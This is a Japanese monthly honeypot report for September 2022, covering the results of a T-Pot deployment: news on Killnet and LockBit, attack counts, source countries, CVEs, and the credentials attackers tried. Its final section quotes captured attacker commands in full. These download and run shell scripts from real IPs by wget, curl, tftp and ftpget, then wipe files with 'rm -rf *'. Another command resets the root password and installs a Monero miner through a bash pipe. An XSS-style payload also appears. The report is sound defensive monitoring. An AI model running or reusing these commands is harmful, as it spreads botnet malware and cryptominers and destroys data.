ハニーポット運用(月次報告:2022年9月)
今月のTopics
9月もサイバー攻撃に関連したニュースが多く報道された。
9月上旬に日本にサイバー攻撃を仕掛けた親ロシア派ハッカー集団「キルネット(Killnet)」が資金難により、攻撃活動を事実上停止した。 Killnetは9月上旬、大量のデータを送り付けてシステム障害を起こすDDoS攻撃を実行。デジタル庁や総務省などの省庁のサイトや、東京メトロやミクシィなどの企業サイトを一時的に閲覧できなくした。 これまで「ロシア政府との関係はなく、活動資金はすべて募金で賄っている」と説明していたが、9月下旬に入り、ロシア国内にある複数の金融機関の口座が凍結されたという。キルネットの創設者は27日、匿名性の高い通信アプリ「テレグラム」に「予算もサーバーもなく、活動を継続できない」と投稿した。
株式会社明治のシンガポール子会社にて身代金要求型コンピューターウイルス「ランサムウエア」によるサイバー攻撃を受け、10万ドル(約1400万円)の支払いを要求されている。攻撃者は世界最大のサイバー犯罪集団「ロックビット3.0」匿名性の高いダークウェブのサイトに犯行声明を出し、9月25日までに10万ドルを支払わないと盗んだ情報を公開すると脅迫しているとのこと。攻撃を受けたのは菓子の製造や輸入販売を行う子会社のメイジセイカ・シンガポール。8月29日朝、事務所内のパソコンを起動したところ、プリンターが身代金を要求するメッセージを大量に印刷した。調査したところ、ロックビットのランサムウエアに感染していた。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2022年9月8日-2022年9月30日
運用期間:22日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Ddospot | 906,720 | ▲341,922 |
| 2 | Cowrie | 834,613 | ▲331,222 |
| 3 | Heralding | 527,795 | ▲90,265 |
| 4 | Honeytrap | 291,385 | ▲332,969 |
| 5 | Dionaea | 266,344 | ▲21,136 |
| 6 | Mailoney | 24,737 | ▲15,313 |
| 7 | Adbhoney | 14,177 | 2,155 |
| 8 | Tanner | 4,291 | ▲2,534 |
| 9 | ConPot | 2,267 | ▲838 |
| 10 | Redishoneypot | 2,095 | ▲14,383 |
| 11 | CitrixHoneypot | 1,276 | ▲1,354 |
| 12 | Ciscoasa | 1,139 | ▲1,235 |
| 13 | ElasticPot | 843 | ▲196 |
| 14 | Dicompot | 179 | 96 |
| 15 | Ipphoney | 133 | ▲38 |
- Result
- 先月に引き続きDdospotの攻撃割合が多かった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Brazil | 656,817 | 1(→) |
| 2 | Russia | 492,843 | 4(↑) |
| 3 | United States | 319,679 | 2(↓) |
| 4 | China | 175,225 | 5(↑) |
| 5 | Netherlands | 138,947 | 3(↓) |
| 6 | Japan | 119,405 | 10(↑) |
| 7 | Germany | 98,728 | 12(↑) |
| 8 | Morocco | 78,177 | 圏外(↑) |
| 9 | Singapore | 57,403 | 11(↑) |
| 10 | Vietnam | 54,799 | 8(↓) |
| 11 | India | 50,688 | 7(↓) |
| 12 | South Korea | 35,664 | 13(↑) |
| 13 | United Kingdom | 35,427 | 9(↓) |
| 14 | France | 30,509 | 16(↑) |
| 15 | Sweden | 26,376 | 14(↓) |
| 16 | Latvia | 24,139 | 15(↓) |
| 17 | Mexico | 23,055 | 20(↓) |
| 18 | Indonesia | 23,030 | 6(↓) |
| 19 | Taiwan | 21,363 | 圏外(↑) |
| 20 | Canada | 20,672 | 19(↓) |
- Result
- ブラジル(1位)、ロシア(2位)、中国(5位)からのアクセスが多かった。
- ウクライナ戦争に関連した攻撃は一見無いように見える。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 426,486 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 620 |
| 3 | CVE-2020-11910 | 294 |
| 4 | CVE-1999-0016 | 13 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 98,707 |
| 2 | admin | 7,613 |
| 3 | nproc | 4,870 |
| 4 | user | 3,640 |
| 5 | test | 2,258 |
| 6 | (empty) | 2,249 |
| 7 | sa | 2,239 |
| 8 | support | 1,621 |
| 9 | 22 | 1,331 |
| 10 | ubuntu | 832 |
| 11 | oracle | 824 |
| 12 | ftpuser | 790 |
| 13 | postgres | 693 |
| 14 | !root | 668 |
| 15 | 2Wire | 659 |
| 16 | guest | 447 |
| 17 | hadoop | 418 |
| 18 | git | 416 |
| 19 | unknown | 379 |
| 20 | blank | 378 |
| 21 | adm | 374 |
| 22 | cameras | 351 |
| 23 | ubnt | 351 |
| 24 | 666666 | 350 |
| 25 | debug | 338 |
| 26 | $ALOC$ | 329 |
| 27 | 0 | 328 |
| 28 | test1 | 326 |
| 29 | test2 | 299 |
| 30 | mysql | 289 |
| 31 | minecraft | 278 |
| 32 | www | 266 |
| 33 | usuario | 260 |
| 34 | testuser | 248 |
| 35 | centos | 242 |
| 36 | student | 231 |
| 37 | esuser | 230 |
| 38 | deploy | 216 |
| 39 | pi | 209 |
| 40 | nagios | 206 |
| 41 | debian | 199 |
| 42 | ftp | 198 |
| 43 | es | 192 |
| 44 | ts3 | 188 |
| 45 | ansible | 187 |
| 46 | ec2-user | 168 |
| 47 | nobody | 156 |
| 48 | steam | 155 |
| 49 | default | 144 |
| 50 | upload | 144 |
- Result
- 先月から変更なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | nproc | 4,870 |
| 2 | admin | 3,994 |
| 3 | 123456 | 3,826 |
| 4 | (empty) | 3,234 |
| 5 | password | 1,933 |
| 6 | 1 | 1,770 |
| 7 | 123 | 1,355 |
| 8 | 12345 | 1,308 |
| 9 | suport | 1,037 |
| 10 | root | 1,009 |
| 11 | 1234 | 1,003 |
| 12 | blank | 996 |
| 13 | 12345678 | 963 |
| 14 | test | 713 |
| 15 | 0 | 691 |
| 16 | user | 564 |
| 17 | Aa123456. | 551 |
| 18 | qwerty | 511 |
| 19 | ubnt | 475 |
| 20 | support | 449 |
| 21 | 00000000 | 439 |
| 22 | 666666 | 427 |
| 23 | alpine | 389 |
| 24 | master | 371 |
| 25 | backup | 368 |
| 26 | 1qaz2wsx | 358 |
| 27 | hi3518 | 354 |
| 28 | cameras | 351 |
| 29 | unknown | 344 |
| 30 | synnet | 336 |
| 31 | !ishtar | 334 |
| 32 | _Cisco | 328 |
| 33 | 10023 | 323 |
| 34 | 1q2w3e4r | 311 |
| 35 | Password | 295 |
| 36 | 123123 | 282 |
| 37 | guest | 276 |
| 38 | 111111 | 274 |
| 39 | minecraft | 250 |
| 40 | 123456789 | 246 |
| 41 | pass | 219 |
| 42 | abc123 | 208 |
| 43 | Passw0rd | 203 |
| 44 | a | 201 |
| 45 | password123 | 192 |
| 46 | toor | 191 |
| 47 | P@ssw0rd | 190 |
| 48 | 1qaz@WSX | 189 |
| 49 | J5cmmu=Kyf0-br8CsW | 182 |
| 50 | 1q2w3e | 181 |
- Result
- 先月に引き続き
J5cmmu=Kyf0-br8CsW|182のパスワードが確認された。
- 先月に引き続き
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
| No | ファイル名 | hash値(md5) | アクセス |
|---|---|---|---|
| 1 | interact.sh | 61aeec46a50c9ea8268014d2e7f0c0ef | htt[p]s://XXX.XXX.XXX.XXX/u001B]8;;htt[p]s:/interact.sh"/onmouseover="alert(1)/u0007example/u001B]8;;/u0007 |
| 2 | ExportLogs.sh | 61aeec46a50c9ea8268014d2e7f0c0ef | htt[p]s://XXX.XXX.XXX.XXX/cgi-bin/ExportLogs.sh |
| 3 | sensi.sh | e5dae88067ee34460dc374e4a7ce88cf | htt[p]://159.223.123.120/cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://159.223.123.120/sensi.sh; curl -O htt[p]://159.223.123.120/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 159.223.123.120 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 159.223.123.120; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.223.123.120 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * |
| 4 | doge.sh | f70871420065756df1bb84627fc7a34a | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p:]//46.23.109.212/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 46.23.109.212 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.23.109.212; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.23.109.212 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * |
| 5 | ohshit.sh | 7400c153a4b749d22af43b5cbfae3bfa | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://92.87.6.205/ohshit.sh; curl -O htt[p]://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf * |
| 6 | snoopybins.sh | ef98cd7dd72ed4bb841b114edd8843fd | cd /tmp || cd /run || cd /; wget htt[p]://45.140.188.40/snoopybins.sh; chmod 777 snoopybins.sh; sh snoopybins.sh; tftp 45.140.188.40 -c get snoopytftp1.sh; chmod 777 snoopytftp1.sh; sh snoopytftp1.sh; tftp -r snoopytftp2.sh -g 45.140.188.40; chmod 777 snoopytftp2.sh; sh snoopytftp2.sh; rm -rf snoopybins.sh snoopytftp1.sh snoopytftp2.sh; rm -rf * |
| 7 | setup_c3pool_miner.sh | - | echo root:23jh133742any1|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L htt[p]://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1 |
◆exeファイルに関するアクセス
- 無し
今月の作業BGM
| 曲名 | アーティスト | 備考 |
|---|---|---|
| The Nights | Avicii | --- |
